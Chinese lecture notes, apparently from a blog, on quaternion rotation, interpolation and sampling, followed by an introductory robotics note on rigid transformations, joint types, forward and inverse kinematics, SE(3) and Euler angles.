$$ \theta = 2 \arccos(w), \quad \hat{\omega} = \begin{cases} \frac{\bold{v}}{\sin(\theta/2)}, & \theta \neq 0 \ 0, & \theta = 0 \end{cases} $$

其中,$w$ 是单位四元数的实部,四元数的一种常见表示就是 $(w,x,y,z)$。

四元数与旋转

向量旋转:任意向量 $\mathbf{v}$ 沿着以 单位向量 定义的旋转轴 $\mathbf{u}$ 旋转 $\theta$ 度得到 $\mathbf{v}'$,那么:

令向量 $\mathbf{v}$ 的四元数形式 $v = [0, \mathbf{v}]$,旋转四元数 $q = \left[\cos\left(\frac{\theta}{2}\right), \sin\left(\frac{\theta}{2}\right)\mathbf{u}\right]$

则旋转后的向量 $\mathbf{v}'$ 可表示为:

$$ \mathbf{v}' = qv q^* = qv q^{-1} $$

如果是给定四元数 $q$ 旋转向量 $\mathbf{v}$ ,那么设 $q = [w, \mathbf{r}]$ 是单位四元数(即 $w^2 + |\mathbf{r}|^2 = 1$),向量 $\mathbf{v}$ 的四元数形式为 $v = [0, \mathbf{v}]$。

则:

$$ \begin{aligned} qvq^* &= [w, \mathbf{r}][0, \mathbf{v}][w, -\mathbf{r}] \ &= [ - \mathbf{r} \cdot \mathbf{v}, w\mathbf{v} + \mathbf{r} \times \mathbf{v} ][w, -\mathbf{r}] \ &= [0, (1-2|\mathbf{r}|^2)\mathbf{v} + 2(\mathbf{r} \cdot \mathbf{v})\mathbf{r} + 2w(\mathbf{r} \times \mathbf{v})] \end{aligned} $$

最后一个等式的展开计算如下

实部:

$$ \begin{aligned} &= (- \mathbf{r} \cdot \mathbf{v})w - (w\mathbf{v} + \mathbf{r} \times \mathbf{v}) \cdot (-\mathbf{r}) \ &= -w (\mathbf{r} \cdot \mathbf{v}) + w (\mathbf{v} \cdot \mathbf{r}) + (\mathbf{r} \times \mathbf{v}) \cdot \mathbf{r} \ &= 0 \quad \end{aligned} $$

虚部:

$$ \begin{aligned} &= (- \mathbf{r} \cdot \mathbf{v})(-\mathbf{r}) + w (w\mathbf{v} + \mathbf{r} \times \mathbf{v}) + (w\mathbf{v} + \mathbf{r} \times \mathbf{v}) \times (-\mathbf{r}) \ &= (\mathbf{r} \cdot \mathbf{v})\mathbf{r} + w^2 \mathbf{v} + w (\mathbf{r} \times \mathbf{v}) - w (\mathbf{v} \times \mathbf{r}) - (\mathbf{r} \times \mathbf{v}) \times \mathbf{r} \ &= (\mathbf{r} \cdot \mathbf{v})\mathbf{r} + w^2 \mathbf{v} + 2w (\mathbf{r} \times \mathbf{v}) - \big[ (\mathbf{r} \cdot \mathbf{r})\mathbf{v} - (\mathbf{v} \cdot \mathbf{r})\mathbf{r} \big] \ &= (1 - 2|\mathbf{r}|^2)\mathbf{v} + 2(\mathbf{r} \cdot \mathbf{v})\mathbf{r} + 2w (\mathbf{r} \times \mathbf{v}) \end{aligned} $$

其中利用了叉乘展开式:

$$ a \times b \times c = (a \cdot c)b - (a \cdot b)c $$

以及单位四元数约束条件 $w^2 + |\mathbf{r}|^2 = 1$,将 $w^2 = 1 - |\mathbf{r}|^2$ 代入后合并同类项。

接下来证明这个结果与罗德里格旋转公式等价即可。

$$ qvq^* = [0, (1-2|\mathbf{r}|^2)\mathbf{v} + 2(\mathbf{r} \cdot \mathbf{v})\mathbf{r} + 2w(\mathbf{r} \times \mathbf{v})] $$

我们有:

  • $w = \cos(\frac{\theta}{2})$
  • $\mathbf{r} = \sin(\frac{\theta}{2})\mathbf{u}$,且 $\mathbf{u}$ 是单位向量,$|\mathbf{u}| = 1$。

所以:

$$ \begin{aligned} 1 - 2|\mathbf{r}|^2 &= 1 - 2\sin^2\left(\frac{\theta}{2}\right) = \cos(\theta) \ \ 2(\mathbf{r} \cdot \mathbf{v})\mathbf{r} &= 2 \left(\sin\left(\frac{\theta}{2}\right)(\mathbf{u} \cdot \mathbf{v})\right) \left(\sin\left(\frac{\theta}{2}\right)\mathbf{u}\right) \ &= 2 \sin^2\left(\frac{\theta}{2}\right) (\mathbf{u} \cdot \mathbf{v}) \mathbf{u} \ &= (1 - \cos(\theta)) (\mathbf{u} \cdot \mathbf{v}) \mathbf{u} \ \ 2w(\mathbf{r} \times \mathbf{v}) &= 2 \cos\left(\frac{\theta}{2}\right) \left(\sin\left(\frac{\theta}{2}\right)(\mathbf{u} \times \mathbf{v})\right) \ &= \left(2 \sin\left(\frac{\theta}{2}\right) \cos\left(\frac{\theta}{2}\right)\right) (\mathbf{u} \times \mathbf{v}) \ &= \sin(\theta) (\mathbf{u} \times \mathbf{v}) \end{aligned} $$

将以上结果代回到 $\mathbf{v}'$ 的表达式中:

$$ \begin{aligned} \mathbf{v}' &= (1-2|\mathbf{r}|^2)\mathbf{v} + 2(\mathbf{r} \cdot \mathbf{v})\mathbf{r} + 2w(\mathbf{r} \times \mathbf{v}) \ &= (\cos(\theta))\mathbf{v} + (1 - \cos(\theta)) (\mathbf{u} \cdot \mathbf{v}) \mathbf{u} + (\sin(\theta)) (\mathbf{u} \times \mathbf{v}) \end{aligned} $$

正是罗德里格旋转公式的结果。

旋转组合:两个旋转 $q_1$ 和 $q_2$ 的组合等价于四元数的乘法:

$$ q_2 (q_1 x q_1^) q_2^ = (q_2 q_1) x (q_1^* q_2^*) $$

虽然四元数不满足交换律,但其满足结合律(可以证明四元数存在对应的四维矩阵,所以矩阵的性质也是四元数的性质)。

注意:

  • 四元数的旋转表示具有 $3$ 个自由度(四个参数加一个单位模长约束)。
  • 几何上,单位四元数可以看作 $4$ 维球面 $S^3$ 的壳。

四元数与旋转矩阵

从四元数到旋转矩阵

因为我们有 $\mathbf{v}' = q \mathbf{v} q^{-1}$ (这里假设 $\mathbf{v}$ 是向量, $q$ 是单位四元数, $\mathbf{v}'$ 是旋转后的向量,并且我们将向量 $\mathbf{v}$ 视为纯四元数 $[0, \mathbf{v}]$ 进行运算),我们可以计算出对应的旋转矩阵为:

令单位四元数 $q = w + x\mathbf{i} + y\mathbf{j} + z\mathbf{k} = [w, (x, y, z)]$,则旋转矩阵 $R(q)$ 为:

$$ R(q) = \begin{bmatrix} 1 - 2y^2 - 2z^2 & 2xy - 2zw & 2xz + 2yw \ 2xy + 2zw & 1 - 2x^2 - 2z^2 & 2yz - 2xw \ 2xz - 2yw & 2yz + 2xw & 1 - 2x^2 - 2y^2 \end{bmatrix} $$

证明:使用三个基向量挨个求就行。

令 $\mathbf{r} = (x, y, z)$。

令 $\mathbf{v} = \mathbf{e}_1 = (1, 0, 0)$。

  • $|\mathbf{r}|^2 = x^2 + y^2 + z^2$
  • $\mathbf{r} \cdot \mathbf{e}_1 = x$
  • $\mathbf{r} \times \mathbf{e}_1 = (x, y, z) \times (1, 0, 0) = (0, z, -y)$

$$ \begin{aligned} \mathbf{v}'_1 &= (1-2(x^2+y^2+z^2))\mathbf{e}_1 + 2x\mathbf{r} + 2w(\mathbf{r} \times \mathbf{e}_1) \ &= (1-2x^2-2y^2-2z^2)(1, 0, 0) + 2x(x, y, z) + 2w(0, z, -y) \ &= (1-2x^2-2y^2-2z^2 + 2x^2, 2xy + 2wz, 2xz - 2wy) \ &= (1 - 2y^2 - 2z^2, 2xy + 2zw, 2xz - 2yw) \end{aligned} $$

这就是矩阵 $R$ 的第一列。

令 $\mathbf{v} = \mathbf{e}_2 = (0, 1, 0)$。

  • $\mathbf{r} \cdot \mathbf{e}_2 = y$
  • $\mathbf{r} \times \mathbf{e}_2 = (x, y, z) \times (0, 1, 0) = (-z, 0, x)$

$$ \begin{aligned} \mathbf{v}'_2 &= (1-2(x^2+y^2+z^2))\mathbf{e}_2 + 2y\mathbf{r} + 2w(\mathbf{r} \times \mathbf{e}_2) \ &= (1-2x^2-2y^2-2z^2)(0, 1, 0) + 2y(x, y, z) + 2w(-z, 0, x) \ &= (2xy - 2wz, 1-2x^2-2y^2-2z^2 + 2y^2, 2yz + 2wx) \ &= (2xy - 2zw, 1 - 2x^2 - 2z^2, 2yz + 2xw) \end{aligned} $$

这就是矩阵 $R$ 的第二列。

令 $\mathbf{v} = \mathbf{e}_3 = (0, 0, 1)$。

  • $\mathbf{r} \cdot \mathbf{e}_3 = z$
  • $\mathbf{r} \times \mathbf{e}_3 = (x, y, z) \times (0, 0, 1) = (y, -x, 0)$

$$ \begin{aligned} \mathbf{v}'_3 &= (1-2(x^2+y^2+z^2))\mathbf{e}_3 + 2z\mathbf{r} + 2w(\mathbf{r} \times \mathbf{e}_3) \ &= (1-2x^2-2y^2-2z^2)(0, 0, 1) + 2z(x, y, z) + 2w(y, -x, 0) \ &= (2xz + 2wy, 2yz - 2wx, 1-2x^2-2y^2-2z^2 + 2z^2) \ &= (2xz + 2yw, 2yz - 2xw, 1 - 2x^2 - 2y^2) \end{aligned} $$

这就是矩阵 $R$ 的第三列。

将 $\mathbf{v}'_1, \mathbf{v}'_2, \mathbf{v}'_3$ 作为列向量组合起来,就得到了图片中给出的旋转矩阵 $R(q)$:

$$ R(q) = \begin{bmatrix} 1 - 2y^2 - 2z^2 & 2xy - 2zw & 2xz + 2yw \ 2xy + 2zw & 1 - 2x^2 - 2z^2 & 2yz - 2xw \ 2xz - 2yw & 2yz + 2xw & 1 - 2x^2 - 2y^2 \end{bmatrix} $$

证毕。

从旋转矩阵到四元数

根据上一步结果,旋转矩阵 $R$ 的迹(trace)满足:

$$ \text{tr}(R) = 3 - 4(x^2 + y^2 + z^2) = 4w^2 - 1 $$

我们可以计算四元数的分量为:

$$ \begin{aligned} w &= \frac{\sqrt{\text{tr}(R)+1}}{2} \ x &= \frac{R_{32}-R_{23}}{4w} \ y &= \frac{R_{13}-R_{31}}{4w} \ z &= \frac{R_{21}-R_{12}}{4w} \end{aligned} $$

其中 $R_{ij}$ 表示矩阵 $R$ 的第 $i$ 行第 $j$ 列的元素。这些公式在 $w \neq 0$ 时有效。

四元数的距离

这部分证明亦可参见 Krasjet / Quaternion 第 4 节・四元数插值(第 37 页)。

在单位三维球面 $S^3$ 上,或两个四元数 $(q_1, q_2)$ 之间的角度:

$$ \langle p, q \rangle = \arccos(p \cdot q) $$

证明:设 $p = (p_w, \mathbf{p}_v)$ 和 $q = (q_w, \mathbf{q}_v)$,那么显然,从 $p$ 旋转到 $q$ 的相对旋转可以由四元数乘法 $\Delta q = q p^*$ 表示。

$$ \begin{aligned} \Delta q &= q p^* \ &= (q_w, \mathbf{q}_v)(p_w, -\mathbf{p}_v) \ &= (q_w p_w - \mathbf{q}_v \cdot (-\mathbf{p}_v), q_w(-\mathbf{p}_v) + p_w \mathbf{q}_v + \mathbf{q}_v \times (-\mathbf{p}_v)) \ &= (q_w p_w + \mathbf{q}_v \cdot \mathbf{p}_v, \dots) \end{aligned} $$

所以,$\Delta q$ 的实部 $\text{Re}(\Delta q) = q_w p_w + \mathbf{q}_v \cdot \mathbf{p}_v$。

这正好是 $p$ 和 $q$ 作为 4D 向量的点积 $p \cdot q$。

$$ \text{Re}(\Delta q) = p \cdot q = \cos \langle p, q \rangle\ \langle p, q \rangle = \arccos(p \cdot q) $$

对应旋转之间的距离:

$$ \text{dist}(p, q) = 2 \arccos(|p \cdot q|) $$

或等价地:

$$ \text{dist}(p, q) = 2 \min {\langle p, q \rangle, \langle p, -q \rangle} $$

这里需要在两个值之间取最小值的原因也可以参见 Krasjet / Quaternion 第 5.4 节・双倍覆盖带来的问题(第 46 页)。

回顾之前四元数与旋转的关系,不难得知两个旋转 $(R_1, R_2)$ 的距离与其对应四元数 $q(R_1)$ 和 $q(R_2)$ 在球面上的距离成线性关系(前者是后者的两倍)。

unit_circle_and_rotation_diagram

四元数插值

这部分证明可以参见 Krasjet / Quaternion 第 5 节・四元数插值(第 41 页)。

线性插值(Linear Interpolation, Lerp)

$$ q(t) = (1-t)q_1 + tq_2 $$

lerp

归一化线性插值(Normalized Linear Interpolation, Nlerp)

$$ q(t) = \frac{(1-t)q_1 + tq_2}{|(1-t)q_1 + tq_2|} $$

省流:就是除个模长,让他恢复为单位四元数。

nlerp

球面线性插值(Spherical Linear Interpolation, Slerp)

以上两种插值都有问题,他们实际上是线性切分了弦长,而不是弧长,这会导致在转动的时候的角速度不均匀:

nlerp

所以,我们要引入新的插值方式,这就是球面线性插值(Spherical Linear Interpolation, Slerp):

$$ q(t) = \frac{\sin((1-t)\theta)}{\sin(\theta)} q_1 + \frac{\sin(t\theta)}{\sin(\theta)} q_2 $$

其中 $\theta$ 是 $q_1$ 和 $q_2$ 之间的夹角,$\theta = \arccos(q_1 \cdot q_2)$。

slerp

证明的一个方法在 Krasjet / Quaternion 第 5.3 节・球面线性插值(第 43 页)。

不过老师的 Slide 上有另一种更简单直观的利用三角函数性质的证明方法:

vector_geometry_angle_diagram

$$ \begin{aligned} \alpha+\beta&=\psi\ \mathbf{v}(t)&=w_0\mathbf{v}0+w_1\mathbf{v}1\ \frac{\sin\alpha}{w_1}&=\frac{\sin\beta}{w_0}=\frac{\sin(\pi-\psi)}1=\sin\psi\ w{0}&=\frac{\sin\beta}{\sin\psi}\ w{1}&=\frac{\sin\alpha}{\sin\psi}\ \psi&=\cos^{-1}(\mathbf{v}_0\cdot\mathbf{v}_1) \end{aligned} $$

第三个式子利用了三角形的性质:

$$ \frac{A}{\sin\alpha}=\frac{B}{\sin\beta}=\frac{C}{\sin\gamma} $$

球面均匀采样

考虑我们如何随机采样一个旋转。

引理:在 $\mathbb{SO}(3)$ 中均匀采样旋转矩阵等价于从单位四元数的集合 $\mathbb{S}(3)$ 中均匀采样。

原因:两个旋转之间的距离与对应的四元数在单位球面上的距离成线性关系。

那么,如何均匀采样 $\mathbb{S}(3)$ 呢?

方法:从四维标准正态分布 $\mathcal{N}(0, I_{4 \times 4})$ 中随机采样一个变量,并将其归一化,从而得到(直接解释为)单位四元数。

原因:由于标准正态分布是各向同性的(即在所有方向上均匀分布),所以采样得到的单位四元数在 $\mathbb{S}(3)$ 中也是均匀分布的。

随后,采样得到的单位四元数也就可以转换为对应的旋转矩阵(如果需要)。

有趣的事实

对于神经网络来讲,最好的旋转表示方法是 9 个数的旋转矩阵。因为其他的表示方法均可能出现对于输入的微小扰动,即一个小的旋转,出现一个跳变,而只有最初最冗余的 $\mathbb{R}^{3\times3}$ 旋转矩阵保证其必然是连续的( 即连续性 ),而这对于神经网络是很好的性质。

各旋转表示方式对比

| Representation | Inverse? | Composing? | Any local movement in SO(3) can be achieved by local movement in the domain? | | --------------- | ----------- | ----------- | ---------------------------------------------------------------------------- | | Rotation Matrix | ✔️ | ✔️ | N/A | | Euler Angle | Complicated | Complicated | No | | Angle-axis | ✔️ | Complicated | ? | | Quaternion | ✔️ | ✔️ | ✔️ |

  • 旋转矩阵:可逆、可组合(矩阵连乘)、但在 $\mathbb{SO}(3)$ 上移动不直接(9 D - 6 约束 = 3DoF)
  • 欧拉角:逆向复杂、组合复杂、因为 Gimbal lock 的存在,与 $\mathbb{SO}(3)$ 不能平滑映射
  • 轴角:可逆、组合复杂、大部分情况下可以与 $\mathbb{SO}(3)$ 平滑映射,但是在边界情况(如旋转 $0$ 度时)不行
  • 四元数:完美

运动规划

形式化表述

配置空间 (Configuration Space)

定义:配置空间(Configuration spcae,C-space)是 $ \mathbb{R}^n $ 的一个子集,包含系统的所有可能状态(即状态空间)。

  • $C$:配置空间,表示所有可能状态的集合。
  • $C_{\text{free}} \subseteq C$:自由空间,包含所有有效状态(无碰撞)。
  • $C_{\text{obs}} \subseteq C$:障碍空间,表示有障碍的无效状态。
  • $C_{\text{free}} \cup C_{\text{obs}} = C$
  • $C_{\text{free}} \cap C_{\text{obs}} = \varnothing$

问题定义

configuration_space_pathfinding

给定:

  • 自由空间 $C_{\text{free}}$。
  • 起始状态 $q_{\text{start}} \in C_{\text{free}}$。
  • 目标状态 $q_{\text{goal}} \in C_{\text{free}}$。

目标:计算一系列动作,使机器人从 $q_{\text{start}}$ 移动到 $q_{\text{goal}}$。

注意,这里的符号 $q$ 不是四元数(quaternion)的意思,其是配置空间中的一个点,即状态。

例如,对于一个机械臂,其配置空间可能是 $\mathbb{R}^n$,那么 $q$ 就是关节的角度组合之一 $(\theta_1, \theta_2, \dots, \theta_n)$。

挑战

  1. 避免障碍物:确保路径始终在 $C_{\text{free}}$ 内。
  2. 长规划时间:路径可能较长,需要优化。
  3. 高维空间:配置空间维度可能很高(例如多关节机器人)。

💾

机器人学 I

2025年3月2日 01:02

基础概念

连杆(Link):按照顺序连接的刚体。

关节(Joint):连接连杆的部件,决定了相邻连杆之间的运动自由度(DoF,Degree of Freedom)。

自由度(DoF,Degree of Freedom):机械臂的自由度是指机械臂能够自由运动的维度。

刚性变换(Rigid Transformation)

点的表示与坐标系

约定:

  • 任意点 $p$ 的位置由一个参考系 $\mathcal{F}_s$ 记录。
  • 点的坐标记为普通字母(如 $p$),向量用粗体字母表示(如 $\mathbf{v}$)。
  • s 代表 space,b 代表 body。

记录公式包含参考系的上标,例如:

coordinate_axes_vector_representation

$$ o_b^s = o_s^s + \mathbf{t}_{s \to b}^s $$

这个公式表示:在坐标系 $\mathcal{F}s$ 中,点 $o_b$ 的位置是 $o_s$ 的位置加上平移向量 $\mathbf{t}{s \to b}^s$。

刚体的位姿变换

刚体自身会绑定一个坐标系 $\mathcal{F}_b$,当刚体移动时,此坐标系也会移动。

所以,刚体的 位姿(位置与姿态,pose) 变化,就是通过 坐标系变换 来对齐两个坐标系。也即将 $\mathcal{F}_s$ 通过旋转和平移变换,使其与 $\mathcal{F}_b$ 重合。

coordinate_frame_transformation_diagram

  • 转动矩阵(rotation):$R_{s \to b}$,用于对齐坐标轴 ${x_i, y_i, z_i}$,代表 “朝向”
  • 平动向量(translation):$\mathbf{t}_{s \to b}$,用于对齐原点 $o_s$ 和 $o_b$,代表 “位置”

$(R_{s \to b}^s, \mathbf{t}_{s \to b}^s)$ 合在一起,就描述了一个刚体的位姿,其拥有 6 个自由度,转动和平动各自拥有 3 个自由度。

  • 原点变换: $$ o_b^s = o_s^s + \mathbf{t}_{s \to b}^s $$
  • 坐标轴变换: $$ [\mathbf{x}_b^s, \mathbf{y}_b^s, \mathbf{z}b^s] = R{s \to b} [\mathbf{x}_s^s, \mathbf{y}_s^s, \mathbf{z}_s^s] $$

如果观察者使用 $\mathcal{F}_s$:

$$ o_s^s = 0, \quad [\mathbf{x}_s^s, \mathbf{y}_s^s, \mathbf{z}s^s] = I{3 \times 3} $$

则:

$$ \mathbf{t}{s \to b}^s = o_b^s, \quad R{s \to b} = [\mathbf{x}_b^s, \mathbf{y}_b^s, \mathbf{z}_b^s] \in \mathbb{R}^{3 \times 3} $$

相对的,如果观察者使用 $\mathcal{F}_b$:

假设刚体上的点 $p$ 在 $\mathcal{F}_b$ 中的坐标为 $p^b$(随刚体运动,所以相对于坐标系 $\mathcal{F}_b$ 固定不变),其在 $\mathcal{F}_s$ 中的坐标为 $p^s$,则有:

  1. 初始时,$\mathcal{F}_s = \mathcal{F}_b$,$p^s = p^b$。
  2. 刚体发生运动,相对于参考系 $\mathcal{F}s$,此运动可以描述为 $(R{s \to b}^s, \mathbf{t}{s \to b}^s)$,则: $$ p^s = R{s \to b}^s p^b + \mathbf{t}_{s \to b}^s $$
  3. 同理,对于任意点 $x^s$,变换后的点 $x'^s$ 表示为: $$ x'^s = R_{s \to b} x^s + \mathbf{t}_{s \to b} $$

值得注意的是,当 $\mathbf{t}{s \to b}^s \neq 0$ 时, $(R{s \to b}^s, \mathbf{t}{s \to b}^s)$ 这个变换并不是线性的。反之,当 $\mathbf{t}{s \to b}^s = 0$ 时,变换是线性的。

齐次坐标

在三维空间中,齐次坐标系将一个点 $x \in \mathbb{R}^3$ 表示为:

$$ \tilde{x} := \begin{bmatrix} x \ 1 \end{bmatrix} \in \mathbb{R}^4 $$

对应的,齐次变换矩阵具有以下形式:

$$ T^s_{s\rightarrow b} = \begin{bmatrix} R^s_{s\rightarrow b} & t^s_{s\rightarrow b} \ 0 & 1 \end{bmatrix} $$

其中 $R^s_{s\rightarrow b}$ 是旋转矩阵,$t^s_{s\rightarrow b}$ 是平移向量。

这么做的原因是,在传统的笛卡尔坐标系中,平移和旋转是两种不同性质的变换:

  • 旋转是线性变换:$x' = Rx$
  • 平移是仿射变换:$x' = x + t$

这导致无法用单一矩阵乘法表示同时包含旋转和平移的变换。而在齐次坐标系中,两种变换统一为:

$$ \begin{bmatrix} x' \ 1 \end{bmatrix} = \begin{bmatrix} R & t \ 0 & 1 \end{bmatrix} \begin{bmatrix} x \ 1 \end{bmatrix} = \begin{bmatrix} Rx + t \ 1 \end{bmatrix} $$

注意,这种变换保持刚体的形状和大小不变,只改变其位置和方向。

通过引入齐次坐标,我们恢复了线性,此时多个变换的组合可以通过矩阵乘法简洁表示,且满足传递性、可逆性:

$$ T_3 = T_2 \cdot T_1 \ T_{2\to1}^2=\left(T_{1\to2}^1\right)^{-1} $$

这极大地简化了计算复杂变换序列的过程,现在,坐标变换遵循一般规则:

$$ x^1 = T^1_{1\rightarrow 2}x^2 $$

直观上容易记混淆这个公式。请记住,这个 $x$ 是随着刚体变动的,$x^2$ 是其在变换后坐标系下的坐标,亦是变换前的坐标,经过固定坐标系下的变换矩阵 $T^1_{1\to2}$ ,就得到了变换后的、在原始固定坐标系下的坐标 $x^1$。

同时,我们显然有:

$$ x^{2}=(T_{1\to2}^{1})^{-1}x^{1}=T_{2\to1}^{2}x^{1} $$

在后文中,我们忽略 $\tilde{}$ ,默认在齐次坐标系下写公式。

多连杆刚体几何

基本关节类型

  1. Revolute Joint(旋转关节 / 铰链关节)

    • 允许绕单一轴线的旋转运动。

    • 1 DoF

      revolute_joint_1_dof

  2. Prismatic Joint(滑动关节 / 平移关节)

    • 允许沿单一方向的平移运动。

    • 1 DoF

      prismatic_joint_1dof_diagram

  3. Helical Joint(螺旋关节)

    • 螺旋运动,即旋转与平移的组合运动,旋转和平移之间存在固定比率。

    • 1 DoF

      helical_one_dof_diagram

  4. Spherical Joint(球形关节 / 球窝关节)

    • 允许绕球心进行任意方向的旋转。

    • 3 DoF

      spherical_joint_ball_socket

总结:

| 关节类型 | 英文名称 | 自由度(DoF) | 运动描述 | | -------- | ------------- | ------------- | ----------------------- | | 旋转关节 | Revolute (R) | 1 | 绕单一轴线旋转 | | 滑动关节 | Prismatic (P) | 1 | 沿单一方向平移 | | 螺旋关节 | Helical (H) | 1 | 螺旋运动(旋转 + 平移) | | 球形关节 | Spherical (S) | 3 | 任意方向旋转 |

基座连杆和末端执行器

基座连杆 (Base link / Root link)

  • 定义:第 0 号连杆。
  • 特点
    • 被视为 “固定” 参考。
    • 空间坐标系 $\mathcal{F}_s$ 附着于此。

末端执行器连杆 (End-effector link)

  • 定义:最后一个连杆。
  • 特点
    • 通常为抓手(gripper)。
    • 末端坐标系 $\mathcal{F}_e$ 附着于此。

robot_arm_kinematics_diagram

如何看坐标系:

  • $\color{red}{x}$ 是红
  • $\color{green}{y}$ 是绿
  • $\color{blue}{z}$ 是蓝

变换矩阵

robot_arm_revolute_joint_diagram

$$ T_{0\to1}^0=\begin{bmatrix}\cos\theta_1&-\sin\theta_1&0&-l_2\sin\theta_1\\sin\theta_1&\cos\theta_1&0&l_2\cos\theta_1\0&0&1&l_1\0&0&0&1\end{bmatrix} $$

要点:旋转矩阵没影响 $z$ 轴;平动向量在平面上也有变动,因为绕着 $l_2$ 左端点转了一下。

prismatic_joint_mechanism_diagram

$$ T_{1\to2}^1=\begin{bmatrix}1&0&0&0\0&1&0&l_3\0&0&1&\theta_2\0&0&0&1\end{bmatrix} $$

要点:转动矩阵为 $I$;平动向量只改了 $y,z$。

robotic_arm_link_end_effector

$$ T_{2\to3}^2=\begin{bmatrix}1&0&0&0\0&1&0&0\0&0&1&-l_4\0&0&0&1\end{bmatrix} $$

要点:转动矩阵为 $I$;平动向量只改了 $z$。

base_to_end_effector_diagram

$$ T_{0\to3}^{0}=T_{0\to1}^{0}T_{1\to2}^{1}T_{2\to3}^{2}=\begin{bmatrix}\cos\theta_{1}&-\sin\theta_{1}&0&-\sin\theta_{1}(l_{2}+l_{3})\\sin\theta_{1}&\cos\theta_{1}&0&\cos\theta_{1}(l_{2}+l_{3})\0&0&1&l_{1}-l_{4}+\theta_{2}\0&0&0&1\end{bmatrix}=\begin{bmatrix}R_{s\to e}^{s}&\mathbf{t}_{s\to e}^{s}\0&1\end{bmatrix} $$

旋转的参数化

参数化:用一组简单的数值参数来完整描述一个复杂系统或对象的过程。

假设我们已经为 Robot 的每个连杆(Link)分配了坐标系,那么我们可以使用相邻(adjacent)坐标系之间的 相对角度平移 来参数化每个关节。

而对于末端执行器(End-Effector),我们又有如下两种方式来表征其位姿:

关节空间表示(Joint space)

  • 这是一个向量空间,其中每个坐标是关节位姿的向量
  • 具体来说,是关节围绕关节轴的 角度 向量
  • 例如,一个 6 自由度机器人会有 6 个关节角度值 $(θ_1, θ_2, θ_3, θ_4, θ_5, θ_6)$

笛卡尔空间表示(Cartesian space)

  • 这是末端执行器刚体变换的空间
  • 用数学符号表示为:$(R_{s→e}, t_{s→e})$
    • 其中 $R_{s→e}$ 表示从基座坐标系到末端执行器坐标系的旋转矩阵
    • $t_{s→e}$ 表示从基座坐标系到末端执行器坐标系的平移向量
  • $\mathcal{F}_e$ 表示末端执行器的坐标系

对比

  • 关节空间 直观地反映了机器人各关节的实际物理状态,强调关节。
  • 笛卡尔空间 则描述了机器人末端在三维空间中的实际位置和方向,更符合人类思考方式,容易进行判断目标是否达成,强调末态。

联系

正向运动学 (Forward Kinematics,FK)

正向运动学将关节空间坐标 $\theta \in \mathbb{R}^n$ 映射到变换矩阵 $T$:

$$ T_{s \rightarrow e} = f(\theta) $$

也即,给定关节角度,计算末端执行器的位置和姿态。

这一映射可以简单地通过沿着运动链组合各个变换矩阵计算得出。

逆向运动学 (Inverse Kinematics,IK)

逆向运动学解决的问题:给定正向运动学 $T_{s \rightarrow e}(\theta)$ 和目标姿态 $T_{target} = \mathbb{SE}(3)$,求解满足以下条件的关节角度 $\theta$:

$$ T_{s \rightarrow e}(\theta) = T_{target} $$

过程:给定末端执行器的目标位置和姿态,计算需要的关节角度

逆向运动学比正向运动学更复杂,因为 $T^{-1}$ 可能很难计算,所以 通常可能有多个解或无解

robot_arm_kinematics_diagram

根据前文所述,三维空间中,任何刚体的完整位姿可以用 6 个独立参数完全描述,即 $(R,t)$。

因此,6 自由度是机械臂实现空间中任意位置和姿态所需的最小自由度数量。这也称为 "完全自由度" 配置。

至少 6 个自由度可以保证覆盖此空间,从而 IK 的方程有解(但有时候可能得不到解析解,只能得到数值解)。

引理:如果机械臂构型满足 Pieper Criterion,则有解析解(闭式解)。

实例:UR5 机械臂。

虽然 6 自由度保证了有解,但是这个解可能超出了可行空间(如碰撞解),所以额外增加 1 个冗余自由度形成 7 自由度,可以扩大解空间,更有可能找到可行解(非碰撞解)。

但我们不能一味增加自由度,因为这会带来工程复杂性并延长反应时间,所以目前工业界一般是 6 或者 7 DoF。

一个 IK 求解方式(cuRobo):

  1. 选定一个初始值 $\theta_0$

  2. 目标:最小化能量函数(Energy Function)

    $$ \arg \min_{\theta} ||T_{s \rightarrow e}(\theta) - T_{target}||_2 $$

  3. 迭代直到收敛

  4. 可以使用 GPU 并行迭代多个随机选定的初始值,加快速度,并尝试找到最优解

应用

假设我们已知机械臂现在状态,我们想要略微移动一点到达新的状态,我们该选择何种表征进行预测?

  1. 使用笛卡尔空间,优点是 $(\Delta R, \Delta t)$ 直观,容易预测,缺点是执行操作所需的 $\Delta \theta$ 难以计算(需要 IK),RT-2 选用的是这种。
  2. 使用关节空间,优点是预测得到 $\Delta \theta$ 后很容易操作,并计算移动后的 $(R, t)$ 以及 $(\Delta R, \Delta t)$ 易于计算(FK),缺点是 $\Delta \theta$ 难以求解,$\pi0$ 选用的是这种。

SE (3) 群与空间变换的表示方法

SE (3) 是 Special Euclidean group in 3 dimensions 的缩写,代表三维特殊欧几里得群。它描述了三维空间中所有的刚体变换(rigid transformations),包括旋转和平移,但不包括缩放、切变等变形。

SE (3) 群可以数学表示为:

$$ \mathbb{SE}(3):=\left{T=\begin{bmatrix}R&\mathbf{t}\0&1\end{bmatrix},R\in\mathbb{SO}(3),\mathbf{t}\in\mathbb{R}^3\right} $$

其中:

  • $\mathbb{SO}(3)$ 是三维特殊正交群,表示所有的三维旋转
  • $t$ 是三维空间中的平移向量

注意这里:

  • 所有三维正交矩阵是 $\mathbb{O}(3)$
  • 旋转矩阵是 $\mathbb{SO}(3) \subset \mathbb{O}(3)$,其满足行列式是 1,因为这样可以保证应用后手性不变,如果行列式是 -1,那么实际上是一个旋转加镜像的操作。

延伸:

  • $\mathbb{SO}(2)$ 是二维旋转矩阵,有 1 个自由度
  • $\mathbb{SO}(3)$ 是三维旋转矩阵,有 3 个自由度

drone_orientation_angles_axes

欧拉角

欧拉角(Euler Angles):描述三维旋转的一种方法,通过三个连续的旋转来表示任意旋转。

eular-angle

  • 绕 X 轴旋转 $\phi$(roll)

    roll

  • 绕 Y 轴旋转 $\theta$(pitch)

    pitch

  • 绕 Z 轴旋转 $\psi$(yaw)

    yaw

应用:相较于旋转矩阵 $R$,所需数值表示从 9 个降低到了 3 个。

$$ \begin{gathered} R_{x}(\alpha):=\begin{bmatrix}1&0&0\0&\cos\alpha&-\sin\alpha\0&\sin\alpha&\cos\alpha\end{bmatrix}\ R_{y}(\beta):=\begin{bmatrix}\cos\beta&0&\sin\beta\0&1&0\-\sin\beta&0&\cos\beta\end{bmatrix}\ R_{z}(\gamma):=\begin{bmatrix}\cos\gamma&-\sin\gamma&0\\sin\gamma&\cos\gamma&0\0&0&1\end{bmatrix} \end{gathered} $$

任意旋转均可拆为 $R=R_{z}(\alpha)R_{y}(\beta)R_{x}(\gamma)$。这个顺序可以变,但一般默认是这个顺序。

问题:

